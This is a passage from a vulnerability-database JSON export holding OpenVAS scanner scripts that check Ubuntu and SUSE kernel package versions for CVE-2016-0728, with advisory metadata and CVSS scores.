15.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2872-3\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2872-3/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU15\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU15.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.2.0-1020-raspi2\", ver:\"4.2.0-1020.27\", rls:\"UBUNTU15.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:29", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-lts-utopic USN-2873-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842610", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842610", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-lts-utopic USN-2873-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842610\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-20 06:16:47 +0100 (Wed, 20 Jan 2016)\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-utopic USN-2873-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-utopic'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Yevgeny Pats discovered that the session\n keyring implementation in the Linux kernel did not properly reference count\n when joining an existing session keyring. A local attacker could use this to\n cause a denial of service (system crash) or possibly execute arbitrary code\n with administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux-lts-utopic on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"2873-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2873-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-59-generic\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-59-generic-lpae\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-59-lowlatency\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-59-powerpc-e500mc\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-59-powerpc-smp\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-59-powerpc64-emb\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-59-powerpc64-smp\", ver:\"3.16.0-59.79~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:34:31", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-01-23T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for kernel (SUSE-SU-2016:0205-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851161", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851161", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851161\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-01-23 06:12:30 +0100 (Sat, 23 Jan 2016)\");\n script_cve_id(\"CVE-2016-0728\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for kernel (SUSE-SU-2016:0205-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The SUSE Linux Enterprise 12 kernel was updated to receive a security fix.\n\n The following security bug was fixed:\n\n - A reference leak in keyring handling with join_session_keyring() could\n lead to local attackers gain root privileges. (bsc#962075,\n CVE-2016-0728).\");\n\n script_tag(name:\"affected\", value:\"kernel on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"SUSE-SU\", value:\"2016:0205-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-extra\", rpm:\"kernel-default-extra~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-extra-debuginfo\", rpm:\"kernel-default-extra-debuginfo~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.12.51~52.39.1\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-macros\", rpm:\"kernel-macros~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-man\", rpm:\"kernel-default-man~3.12.51~52.39.1\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:14", "description": "Mageia Linux Local Security Checks mgasa-2016-0031", "cvss3": {}, "published": "2016-01-25T00:00:00", "type": "openvas", "title": "Mageia Linux Local Check: mgasa-2016-0031", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0728"], "modified": "2019-03-14T00:00:00&qu